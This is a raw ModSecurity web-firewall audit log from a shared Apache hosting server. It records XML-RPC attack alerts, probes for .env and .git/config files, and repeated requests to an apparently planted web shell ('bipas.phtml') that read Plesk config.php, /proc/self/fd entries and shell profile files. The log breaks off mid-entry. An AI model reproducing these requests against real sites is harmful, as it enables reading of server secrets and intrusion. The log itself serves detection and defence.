Host: best-website-designs.com X-Real-IP: 213.204.244.147 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 679 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: sv-SE,sv;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --e8d25c62-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --e8d25c62-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFCoBNdrHB-pK97UdV9aHQAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750116356671901 777757 (- - -) Stopwatch2: 1750116356671901 777757; combined=2129, p1=366, p2=1325, p3=63, p4=53, p5=195, sr=105, sw=127, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e8d25c62-Z-- --6f06805a-A-- [17/Jun/2025:04:56:47.889087 +0530] aFCoN5VkCcfT-Z8NQYzB5wAAAAc 216.73.216.240 57374 127.0.0.1 7081 --6f06805a-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fusr%2Flocal%2Fpsa%2Fbootstrapper%2Fpp18.0.65-bootstrapper%2FUpgrader&viewfile=%2F%2Fusr%2Flocal%2Fpsa%2Fbootstrapper%2Fpp18.0.65-bootstrapper%2FUpgrader%2FConfig.php HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --6f06805a-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 10769 Connection: close Content-Type: text/html; charset=UTF-8 --6f06805a-H-- Message: Warning. Matched phrase "/config.php" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: /config.php found within ARGS:viewfile: /usr/local/psa/bootstrapper/pp18.0.65-bootstrapper/upgrader/config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/config.php" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: /config.php found within ARGS:viewfile: /usr/local/psa/bootstrapper/pp18.0.65-bootstrapper/upgrader/config.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCoN5VkCcfT-Z8NQYzB5wAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750116407882856 6314 (- - -) Stopwatch2: 1750116407882856 6314; combined=2680, p1=346, p2=2180, p3=35, p4=41, p5=78, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6f06805a-Z-- --a169a120-A-- [17/Jun/2025:04:57:01.358554 +0530] aFCoRNdrHB-pK97UdV9aRgAAAAI 213.204.244.147 58836 127.0.0.1 7081 --a169a120-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 213.204.244.147 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 681 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: sv-SE,sv;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --a169a120-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a169a120-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFCoRNdrHB-pK97UdV9aRgAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750116420549781 808863 (- - -) Stopwatch2: 1750116420549781 808863; combined=2923, p1=405, p2=1913, p3=104, p4=112, p5=241, sr=134, sw=148, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a169a120-Z-- --01d5715c-A-- [17/Jun/2025:04:58:56.501753 +0530] aFCouIoVQnPDyHnl9oPQ6AAAAAY 3.94.199.128 50830 127.0.0.1 7081 --01d5715c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/72 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.94.199.128 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --01d5715c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --01d5715c-H-- Message: Warning. Matched phrase "proc/self/fd/7" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/7 found within ARGS:viewfile: /proc/self/fd/72"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/7" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/7 found within ARGS:viewfile: /proc/self/fd/72"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCouIoVQnPDyHnl9oPQ6AAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750116536497400 4410 (- - -) Stopwatch2: 1750116536497400 4410; combined=2359, p1=386, p2=1840, p3=39, p4=26, p5=67, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --01d5715c-Z-- --96ca513a-A-- [17/Jun/2025:04:59:00.492885 +0530] aFCou6C450Yw050Ymr0jpgAAAAk 213.204.244.147 50116 127.0.0.1 7081 --96ca513a-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 213.204.244.147 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 683 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: sv-SE,sv;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --96ca513a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --96ca513a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 213.204.244.147 (1+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aFCou6C450Yw050Ymr0jpgAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750116539706295 786653 (- - -) Stopwatch2: 1750116539706295 786653; combined=2278, p1=370, p2=1490, p3=94, p4=50, p5=171, sr=104, sw=103, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --96ca513a-Z-- --179a6f3b-A-- [17/Jun/2025:05:00:38.257556 +0530] aFCpHOTJOk1gXj_qIh4VfwAAAAQ 52.169.50.46 54708 127.0.0.1 7081 --179a6f3b-B-- GET /hitech-news.com HTTP/1.0 Host: www.gulachi.com X-Real-IP: 52.169.50.46 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: _sfs_id=56661524c3e5959bb1ec823865d5054f1750115428; PHPSESSID=q6vjfehr3tf9ga1e319qbmhpjv; wordpress_test_cookie=WP%20Cookie%20check --179a6f3b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Pragma: no-cache Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Connection: close Content-Type: text/html; charset=UTF-8 --179a6f3b-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.gulachi.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.gulachi.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.gulachi.com"] [uri "/hitech-news.com"] [unique_id "aFCpHOTJOk1gXj_qIh4VfwAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750116636523479 1734142 (- - -) Stopwatch2: 1750116636523479 1734142; combined=2354, p1=318, p2=1923, p3=0, p4=0, p5=113, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --179a6f3b-Z-- --71b93528-A-- [17/Jun/2025:05:05:02.282062 +0530] aFCqJooVQnPDyHnl9oPR5AAAAAY 216.73.216.240 54058 127.0.0.1 7081 --71b93528-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fbase-files&viewfile=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fbase-files%2Fdot.bashrc HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --71b93528-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4434 Connection: close Content-Type: text/html; charset=UTF-8 --71b93528-H-- Message: Warning. Matched phrase ".bashrc" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .bashrc found within ARGS:viewfile: /proc/self/root/usr/share/base-files/dot.bashrc"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".bashrc" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .bashrc found within ARGS:viewfile: /proc/self/root/usr/share/base-files/dot.bashrc"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCqJooVQnPDyHnl9oPR5AAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750116902276490 5651 (- - -) Stopwatch2: 1750116902276490 5651; combined=2749, p1=401, p2=2149, p3=41, p4=56, p5=102, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --71b93528-Z-- --e47bce45-A-- [17/Jun/2025:05:07:53.597794 +0530] aFCq0YoVQnPDyHnl9oPSZwAAAAY 18.213.102.186 60914 127.0.0.1 7081 --e47bce45-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/145 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 18.213.102.186 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --e47bce45-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --e47bce45-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/145"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/145"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCq0YoVQnPDyHnl9oPSZwAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750117073593760 4087 (- - -) Stopwatch2: 1750117073593760 4087; combined=2057, p1=368, p2=1571, p3=37, p4=25, p5=56, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e47bce45-Z-- --90b79a4e-A-- [17/Jun/2025:05:08:13.930744 +0530] aFCq5QJ4p5Cdblnjra52uQAAAAI 64.227.137.225 49122 127.0.0.1 7080 --90b79a4e-B-- GET /.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 64.227.137.225 Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --90b79a4e-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --90b79a4e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.env"] [unique_id "aFCq5QJ4p5Cdblnjra52uQAAAAI"] Stopwatch: 1750117093927667 3124 (- - -) Stopwatch2: 1750117093927667 3124; combined=1914, p1=420, p2=1392, p3=20, p4=27, p5=55, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --90b79a4e-Z-- --8d275456-A-- [17/Jun/2025:05:08:14.446228 +0530] aFCq5gJ4p5Cdblnjra52ugAAAAI 64.227.137.225 49136 127.0.0.1 7080 --8d275456-B-- GET /.git/config HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 64.227.137.225 Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* Accept-Encoding: gzip --8d275456-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d275456-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/.git/config"] [unique_id "aFCq5gJ4p5Cdblnjra52ugAAAAI"] Stopwatch: 1750117094443072 3208 (- - -) Stopwatch2: 1750117094443072 3208; combined=2062, p1=338, p2=1585, p3=28, p4=35, p5=76, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8d275456-Z-- --2b3cf34e-A-- [17/Jun/2025:05:08:17.004157 +0530] aFCq6IoVQnPDyHnl9oPShwAAAAY 100.28.44.58 45858 127.0.0.1 7081 --2b3cf34e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/68 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 100.28.44.58 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --2b3cf34e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2953 Connection: close Content-Type: text/html; charset=UTF-8 --2b3cf34e-H-- Message: Warning. Matched phrase "proc/self/fd/6" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/6 found within ARGS:viewfile: /proc/self/fd/68"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/6" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/6 found within ARGS:viewfile: /proc/self/fd/68"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCq6IoVQnPDyHnl9oPShwAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750117096998579 5649 (- - -) Stopwatch2: 1750117096998579 5649; combined=3043, p1=478, p2=2390, p3=64, p4=35, p5=76, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2b3cf34e-Z-- --06565c08-A-- [17/Jun/2025:05:08:24.558898 +0530] aFCq8ArsPejRtmHkrKLfgwAAAAE 54.167.32.123 45538 127.0.0.1 7081 --06565c08-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/118 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 54.167.32.123 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --06565c08-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --06565c08-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/118"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/118"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCq8ArsPejRtmHkrKLfgwAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1750117104554373 4577 (- - -) Stopwatch2: 1750117104554373 4577; combined=2241, p1=336, p2=1782, p3=38, p4=30, p5=55, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --06565c08-Z-- --8c14086c-A-- [17/Jun/2025:05:08:36.509816 +0530] aFCq_JWbMc1Q3J_M-mhHlwAAAAo 44.213.36.21 35914 127.0.0.1 7081 --8c14086c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/2 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 44.213.36.21 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --8c14086c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2952 Connection: close Content-Type: text/html; charset=UTF-8 --8c14086c-H-- Message: Warning. Matched phrase "proc/self/fd/2" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/2 found within ARGS:viewfile: /proc/self/fd/2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/2" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/2 found within ARGS:viewfile: /proc/self/fd/2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFCq_JWbMc1Q3J_M-mhHlwAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750117116505491 4378 (- - -) Stopwatch2: 1750117116505491 4378; combined=2381, p1=336, p2=1923, p3=41, p4=27, p5=54, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8c14086c-Z-- --c5848e50-A-- [17/Jun/2025:05:09:15.898074 +0530] aFCrI-TJOk1gXj_qIh4XCwAAAAQ 216.73.216.240 39556 127.0.0.1 7081 --c5848e50-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fbase-files&viewfile=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fbase-files%2Fdot.profile HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.240 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --c5848e50-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3120 Connection: close Content-Type: text/html; charset=UTF-8 --c5848e50-H-- Message: Warning. Matched phrase ".profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .profile found within ARGS:viewfile: /proc/self/root/usr/share/base-files/dot.profile"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: .profile found within ARGS:viewfile: /proc/self/root/usr/share/base-files/dot.profile"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname 